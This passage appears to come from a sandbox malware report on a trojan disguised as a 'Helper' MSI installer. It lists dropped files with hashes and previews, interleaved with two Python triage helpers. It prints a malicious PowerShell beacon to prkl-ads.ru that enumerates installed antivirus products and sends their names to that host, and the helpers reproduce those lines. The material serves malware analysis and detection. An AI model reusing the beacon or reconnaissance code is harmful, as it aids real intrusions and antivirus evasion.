                                                                                                                                                                      SHA-512:ABCFA0C5CB82311C365AFFA786FA04E4B6DEDD6C0E4F4CFF9342EBAA423387A16512CF414A9C24CDB6833B018B82A1FD29F25DF73B89DFE74176E6B7343D2C5F
                                                                                                                                                                      Malicious:true
Preview (decoded from UTF-16LE with BOM, CRLF restored; this is the user script the launcher above runs: a registration beacon, a short sleep, then enumeration of installed AV products via WMI whose display names are placed in the query string of a second request; the on-disk file continues past this point):

Invoke-WebRequest -Uri ("https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test") -UseBasicParsing

sleep -Milliseconds 1297

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$AntiVirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
$displayNames = $AntiVirusProduct | ForEach-Object {
    $_.displayName
}
$displayNamesString = $displayNames -join ", "
$url11 = "https://prkl-ads.ru/?status=start&av=$displayNamesString"
(preview truncated)
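The two text drops above are UTF-16LE with a BOM, which is why the report's raw preview shows a dot after every character. The following is an added triage helper, not code from the report or from the sample: it decodes a dropped text file the way the "File Type" line implies, hashes it the way the report does, and pulls out the indicators a responder wants from this script (contacted URLs and hosts, the WMI class queried, whether AV names are interpolated into a later request). The sample bytes are constructed here from the statements visible in the 1854-byte script's preview; the real file is longer, so its digests will not match the report's. The WMI regex assumes the `-Namespace ... -Class` ordering used in this script.

```python
"""Decode a dropped PowerShell script and extract triage indicators.

Added example (not part of the sandbox report or the sample).  SAMPLE_BYTES is
constructed from the visible head of the 1854-byte dropped script, re-encoded
the way it sat on disk (BOM + UTF-16LE + CRLF); the real file is longer.
"""
import hashlib
import re

SCRIPT_TEXT = "\r\n".join([
    'Invoke-WebRequest -Uri ("https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test") -UseBasicParsing',
    '',
    'sleep -Milliseconds 1297',
    '',
    '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12',
    '$AntiVirusProduct = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct',
    '$displayNames = $AntiVirusProduct | ForEach-Object {',
    '    $_.displayName',
    '}',
    '$displayNamesString = $displayNames -join ", "',
    '$url11 = "https://prkl-ads.ru/?status=start&av=$displayNamesString"',
]) + "\r\n"
SAMPLE_BYTES = b"\xff\xfe" + SCRIPT_TEXT.encode("utf-16-le")   # constructed sample

URL_RE = re.compile(r"""https?://[^\s"'()]+""")
# Assumes the -Namespace "..." -Class X ordering seen in this script.
WMI_RE = re.compile(
    r'Get-(?:Wmi|Cim)(?:Object|Instance)\s+-Namespace\s+"([^"]+)"\s+-Class(?:Name)?\s+(\w+)', re.I)


def decode_dropped_text(data: bytes) -> str:
    """BOM-tagged UTF-16LE (the two scripts), BOM-less UTF-16LE (NUL after
    every ASCII byte), otherwise UTF-8/ASCII (the Invoke-WebRequest log)."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le", errors="replace")
    if len(data) >= 4 and data[1] == 0 and data[3] == 0:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def hashes(data: bytes) -> dict:
    """The digests the report lists for every dropped file."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def extract_iocs(script: str) -> dict:
    """Network and host-reconnaissance indicators from PowerShell source."""
    urls = URL_RE.findall(script)
    hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0].split("?")[0] for u in urls})
    wmi = [f"{ns}\\{cls}" for ns, cls in WMI_RE.findall(script)]
    flags = {
        "invoke_webrequest": bool(re.search(r"\bInvoke-WebRequest\b", script, re.I)),
        "use_basic_parsing": bool(re.search(r"-UseBasicParsing\b", script, re.I)),
        "forces_tls12": "SecurityProtocolType]::Tls12" in script,
        "enumerates_av": any(c.lower().endswith("\\antivirusproduct") for c in wmi),
        # AV display names interpolated into the query string of a later request
        "av_names_in_url": any("$displayNames" in u for u in urls),
    }
    return {"urls": urls, "hosts": hosts, "wmi_classes": wmi, "flags": flags}


if __name__ == "__main__":
    text = decode_dropped_text(SAMPLE_BYTES)
    print("sha256:", hashes(SAMPLE_BYTES)["sha256"])
    for key, value in extract_iocs(text).items():
        print(f"{key}: {value}")
```

Run it against the real drops by reading the file bytes into `decode_dropped_text`; the hashes of the 1-byte "1" files listed above come out of `hashes(b"1")` exactly as the report prints them, which is a cheap way to confirm the report's digest convention (uppercase hex) before matching against your own telemetry.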
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3440640
                                                                                                                                                                      Entropy (8bit):6.332754172601424
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
                                                                                                                                                                      MD5:59A74284EACB95118CEDD7505F55E38F
                                                                                                                                                                      SHA1:ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
                                                                                                                                                                      SHA-256:7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
                                                                                                                                                                      SHA-512:E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                      Entropy (8bit):6.553977992744686
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                                                                                                                                      MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                                                                                                                                      SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                                                                                                                                      SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                                                                                                                                      SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, Author: Joe Security
                                                                                                                                                                      Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, many, 1625945 bytes, 2 files, at 0x44 +A "z2201x64.exe" +A "icon.png", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 51 datablocks, 0x1 compression
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1636377
                                                                                                                                                                      Entropy (8bit):7.999871457469054
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:24576:6/2i+GjI+uAld+dnnMT+EPZexEjXRfVLr5RfbZGTF37oO/ChJ8mtEMHnH:C1I+uE4nnMdx5fVD07oOdmtnH
                                                                                                                                                                      MD5:6738E7486358FFB12D914A2CE355DEF3
                                                                                                                                                                      SHA1:3DCB2576DAE364D198972030C20DB2903A1740C3
                                                                                                                                                                      SHA-256:02EFB04CA84D4140D4475F317D8E7810D07894E9865582DFD9C1EEF947C85A60
                                                                                                                                                                      SHA-512:6000841128D45CA522DF6B770ADDE47409A667E7F1E1C2A8BB61BBB0658C9604530F4B98A950310BDF3C9F2215A309F0ABF4B14021B8321CDBBF4954F15B0113
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MSCF....Y.......D...........................Y....(..........z...3....3.........V.. .z2201x64.exe......3.....VA. .icon.png.....M..CK..x.U.0\.]I:....`.......6*...I.....B'...$1...:U..d...T.=......:..:3...."2.i.....B.v&hf.bg...4...[......w..{......{....[..c.1&.aX.T.a.2.?.......w.q....N.k....U..........kK....O...z{.z{...u5e.w..;&C...'...l.?t..(.............d..Z....[.Wby..Zo.......mj....eUk+......&......O...0..R...S.....".X.j...F.N.3r..4qW]...hE.;|.....N......p#...4.y..@.o..........g?.#T9z..?;.<qw..T(e.........P.u.V..@._.h...z.w.k.k.}..z....1.....O......;....._M...b.....R.6...<..0$...]L.I.p.Fh ....b...Y.'ZA>T.Z....+....V..V...A.B.R(Z+....8.o..h...6h....1...P=.h..R...W.....V.zZ.]l...[.].K....;sC.7.2.n.f...3...&@..6.Xb....9.V..I.OeUgX.t...q.&...ps.... Q...].....W9.`d....T.P.QM...P.h'.e.I.2..J.....V55....g.V...}.....7*....-.*!.|.4.<.....'p.p..(....[n@.V.+'.........BF..j....ym?.$....j.A.<..q......J.R.~.....aP.~ G:m.5}..d......R\..B........[
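The "File Type" line above is derived from the cabinet's directory structures (CFHEADER, CFFOLDER, CFFILE), which sit in front of the compressed data. The following is an added example, not code from the report or the sample: a parser that walks those structures to list member names, sizes and attributes without ever touching a CFDATA block, so it can be run on a hostile cabinet. The cabinet it parses is a constructed header-only fragment laid out to match the report's values (flags 0x4 with 20 reserved header bytes, set ID 1234, cabinet number 1, one MSZIP folder of 51 data blocks, CFFILE table at 0x44, members z2201x64.exe and icon.png with the archive attribute); the member sizes in it are assumed.

```python
"""List the members of a Microsoft Cabinet from its directory alone.

Added example, not code from the report or the sample.  build_sample_cab()
returns a constructed header-only cabinet matching the report's metadata;
the member sizes in it are made up.
"""
import struct
from dataclasses import dataclass

CFHDR_PREV_CABINET = 0x1
CFHDR_NEXT_CABINET = 0x2
CFHDR_RESERVE_PRESENT = 0x4
ATTR_ARCHIVE = 0x20
COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}


@dataclass
class CabMember:
    name: str
    size: int
    folder: int
    attribs: int


def _cstring(buf: bytes, off: int):
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_cab_directory(buf: bytes) -> dict:
    """Parse CFHEADER, the optional reserve/prev/next fields, every CFFOLDER
    and every CFFILE.  Compressed CFDATA blocks are never read."""
    if buf[:4] != b"MSCF":
        raise ValueError("not a cabinet (no MSCF signature)")
    (cb_cabinet, coff_files, minor, major, c_folders, c_files,
     flags, set_id, i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", buf, 4)
    off = 36
    cb_cffolder = reserve_len = 0
    if flags & CFHDR_RESERVE_PRESENT:           # per-header/folder/data reserve sizes
        reserve_len, cb_cffolder, _cb_cfdata = struct.unpack_from("<HBB", buf, off)
        off += 4 + reserve_len
    for flag in (CFHDR_PREV_CABINET, CFHDR_NEXT_CABINET):
        if flags & flag:                         # cabinet name + disk name, NUL-terminated
            _, off = _cstring(buf, off)
            _, off = _cstring(buf, off)
    folders = []
    for _ in range(c_folders):
        data_off, n_blocks, ctype = struct.unpack_from("<IHH", buf, off)
        folders.append({"data_offset": data_off, "blocks": n_blocks,
                        "compression": COMPRESSION.get(ctype & 0xF, hex(ctype))})
        off += 8 + cb_cffolder
    if off != coff_files:
        raise ValueError(f"CFFILE table at {coff_files:#x} but directory ends at {off:#x}")
    members = []
    for _ in range(c_files):
        size, _start, ifolder, _date, _time, attribs = struct.unpack_from("<IIHHHH", buf, off)
        name, off = _cstring(buf, off + 16)
        members.append(CabMember(name, size, ifolder, attribs))
    return {"version": f"{major}.{minor}", "declared_size": cb_cabinet,
            "files_offset": coff_files, "flags": flags, "set_id": set_id,
            "cabinet_index": i_cabinet, "reserve_bytes": reserve_len,
            "folders": folders, "members": members}


def build_sample_cab() -> bytes:
    """Constructed header-only cabinet mirroring the report's CAB metadata."""
    members = [("z2201x64.exe", 1600000, ATTR_ARCHIVE), ("icon.png", 25000, ATTR_ARCHIVE)]
    table, start = b"", 0
    for name, size, attr in members:
        table += struct.pack("<IIHHHH", size, start, 0, 0, 0, attr) + name.encode() + b"\x00"
        start += size
    tail = struct.pack("<HBB", 20, 0, 0) + b"\x00" * 20        # 20 reserved header bytes
    coff_files = 36 + len(tail) + 8                            # one CFFOLDER, no folder reserve
    folder = struct.pack("<IHH", coff_files + len(table), 51, 1)   # 51 MSZIP CFDATA blocks
    head = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, coff_files + len(table), 0, coff_files,
                                 0, 3, 1, 1, len(members), CFHDR_RESERVE_PRESENT, 1234, 1)
    return head + tail + folder + table


if __name__ == "__main__":
    d = parse_cab_directory(build_sample_cab())
    print(f"cabinet v{d['version']}, set {d['set_id']} #{d['cabinet_index']}, flags {d['flags']:#x}, "
          f"{d['reserve_bytes']} reserved bytes, CFFILE table at {d['files_offset']:#x}")
    for f in d["folders"]:
        print(f"folder: {f['blocks']} blocks, {f['compression']}")
    for m in d["members"]:
        print(f"  {'+A' if m.attribs & ATTR_ARCHIVE else '  '} {m.name:20} {m.size} bytes")
```

On a real drop, compare `declared_size` with the size on disk: the cabinet above is 1636377 bytes on disk while its header advertises a smaller total, and such a gap is worth noting before handing the file to an extractor. The 20 reserved header bytes (flag 0x4) are an application-defined area that installers use for their own metadata; the parser skips them but reports their length.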
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
File Type:data
Category:dropped
Size (bytes):1636377
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:4122C39F1D4ACC64F4D4E505814B754E
SHA1:181F83CDFDF4DC5FBC3B69EDAEA7A29093DE7FFA
SHA-256:658F96AAA0B744D2B7965EEA945FB61AE29616E9E3446C7A9CF8D20B83198272
SHA-512:2C8DD01A0645599F69B97408BBF466381CEC711168316D0C6565999F5C660D4CD090DCE6D0ABDEAA9D7E93BD3EB2BE96C60110EAF79E015F440989E27C599C74
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1586120
Entropy (8bit):7.996101897489759
Encrypted:true
SSDEEP:24576:8GIyixBMj+/A2d+UKnvT+LwZWj7iDDVVYrz0rbzGTw3DoA/sk6smc:8Gbj+/BpKnvyIxVV/XDoAfmc
MD5:F6F745D4ED6591DD99D5BF0405C4AD85
SHA1:50E909F0206BF32D995D3BFFD1F9A37F41CA3386
SHA-256:D788FAF6DF8C14A4333B4427747D873D003A124F3D7ADD420D72CA473305476C
SHA-512:1F8FCE6A4A000005D319A69E63D4FF848BDC5C6C6FA43F93AD14042C0B7130094E67415C8EC563A42E515D14B038DE8C3774F0ED321E0493E2EC347225275CF5
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\msiexec.exe
File Type:PNG image data, 519 x 512, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):60877
Entropy (8bit):7.946799086000062
Encrypted:false
SSDEEP:1536:puSWyp4+uaXr58E7E9gzMs7kltmYvvxJZXPU:TWz+5Xd8WE9gzN7Stm8ZJZc
MD5:0269218FAEE62DF36DE1E6C2D463A0A6
SHA1:F2151D8964B842C6A7C6F43B71A9600F70EDDEB8
SHA-256:C68E7ADB0CC03BFAE373FC028DB020C631E0543A65D00EE2A37DB24042C80020
SHA-512:312BB32745DEDCE253E72587798D28CD45D14367892C1376BAE24867DA4370B108B50CF0036B12E5140A222E5323C47283B16B70473F9F0EE60F0F127DD90910
Malicious:false
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:dropped
Size (bytes):2483712
Entropy (8bit):6.553977992744686
Encrypted:false
SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
MD5:5CB6155D5FCC94F92C8B05AECD0C300B
SHA1:D611E0353633D273702B9A751EDB4269C7E03536
SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
Malicious:true
Yara Hits:
• Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\446fc6.msi, Author: Joe Security
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):570784
Entropy (8bit):6.450187144191945
Encrypted:false
SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
MD5:DB7612F0FD6408D664185CFC81BEF0CB
SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):722336
                                                                                                                                                                      Entropy (8bit):6.433567465029135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:xZCGkZjiIiS4fZrmrRahiyN+bqpoMU0Z/4CwwEjD4JyVzIXyJe55EL96RgO5uh:xBkZVI+ep5U2fvEjD4wzIXX5EL96RX5u
                                                                                                                                                                      MD5:F7B1DDC86CD51E3391AA8BF4BE48D994
                                                                                                                                                                      SHA1:A0C0A4A77991D7F8DF722ACDD782310A6DA2A904
                                                                                                                                                                      SHA-256:AC2DF3283D65AB78CA399232FA090764636E0FEC7AB53BE28F6EE93733D8787F
                                                                                                                                                                      SHA-512:F853C3CF9EC175E946DD42F7F35D130F4FB941F64BBF5780CE452FE6E87459217B80872DB375AD1BBAFC47AD263408E4222D81F62C7DF92C77E23E77E67E6FA6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......m..D)...)...).......$...........f...8...f...1.......0...f...t.......(.......>...)...F.......a.......(.....*.(...).B.(.......(...Rich)...........................PE..L.....c.........."!..."..................................................... ......q.....@.........................@M......\N..........h................#.......o..8@..p....................@..........@....................K..@....................text...|........................... ..`.rdata..Bb.......d..................@..@.data....'...p.......V..............@....rsrc...h............l..............@..@.reloc...o.......p...r..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3918
                                                                                                                                                                      Entropy (8bit):6.891537366624384
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:5Y1TcDRT47TyAWlyfvnVhJ/07oB4fxBBujlhrSxKEvwOT8W:5Y1cDR8/DgMH00Kfx7kHrSxKK8W
                                                                                                                                                                      MD5:459DAF3A4803C18594A13FE32AD7705C
                                                                                                                                                                      SHA1:5984F1907B1F74879F72A687FF5457233776062E
                                                                                                                                                                      SHA-256:A7F477BDEB7EAAB934E414FAF135A63FE1A8F6F427D041E32B76C71C57EEB67B
                                                                                                                                                                      SHA-512:6EA3C6B755E1E217CD55030C4DC3F3458797724CB23EED2435056661C6EA4E5BE020BE56E641DE33C04035392C8322D39C4708B0871331CF295DA9882F4EB83F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@j..W.@.....@.....@.....@.....@.....@......&.{8415BADB-0228-466E-A597-68F06CD8880C}..Helper..Helper.msi.@.....@.....@.....@........&.{3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}.....@.....@.....@.....@.......@.....@.....@.......@......Helper......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{1DAA5F1C-35AF-4DBC-BCD3-B8B55A5E6DC0}9.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\.@.......@.....@.....@......&.{96C4647E-D5A3-492E-A70C-151AAE336B85}..01:\Software\Helper Company LLC\Helper\Version.@.......@.....@.....@......&.{E50D5DA2-61B1-4DD4-BD53-57A21481EBCF}d.01:\Software\Caphyon\Advanced Installer\LZMA\{8415BADB-0228-466E-A597-68F06CD8880C}\1.0.0\AI_ExePath.@.......@.....@.....@......&.{2E55D07B-CAEF-4B54-92D8-F9199243F537}G.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe.@.......@.....@.....@......&.{1DD84FFF-FB0
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):634784
                                                                                                                                                                      Entropy (8bit):6.564827321629019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                                                                                                                                                      MD5:A619F980C1BAA155F7CFB79553AA10B1
                                                                                                                                                                      SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                                                                                                                                                      SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                                                                                                                                                      SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.2007303511197318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:JSbX72FjTXAlfLIlHuRp1hG7777777777777777777777777ZDHF0buM1MQ7tWOK:JdUIwI6FzcO2tFF
                                                                                                                                                                      MD5:A117EF4F4DCA8C613B5F61CA997F487A
                                                                                                                                                                      SHA1:5734E3C9A7A8EE9B14BAA53F76F8B4D519866D88
                                                                                                                                                                      SHA-256:B8C4193786C7A769A89F8A6477C2822CF0B5D200710789BC96A1365BEC057CFC
                                                                                                                                                                      SHA-512:BC9BDFD80FA33ECA600B65E3F070FF9D2B8D6E210C78FE1D1E737E591C5F8E86FCC57B7AAEF029D9CEB0C681154D6A63AAA0D6A6EEC69D99BDF847B98183C3B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):404314
                                                                                                                                                                      Entropy (8bit):5.400357729242869
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFg:i0LVlABOYCe6+K
                                                                                                                                                                      MD5:D574EB68889B115580C7BC0DDE92A52D
                                                                                                                                                                      SHA1:01CFA428024A503D1754C4DAFFF2594473B4FD60
                                                                                                                                                                      SHA-256:6D5CD0EE4962F30F6A966061C479A942A3DAA06E2C93387CB70152F1E197A6CD
                                                                                                                                                                      SHA-512:246BCCBD642FB739C6292ADCE7A8EA560899681D3718585B05DC311E930AFAD94BE8FC2E8D3B681D18E9390D0F62679BB2E0FA27DEEFC1A02156B4E053100F96
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
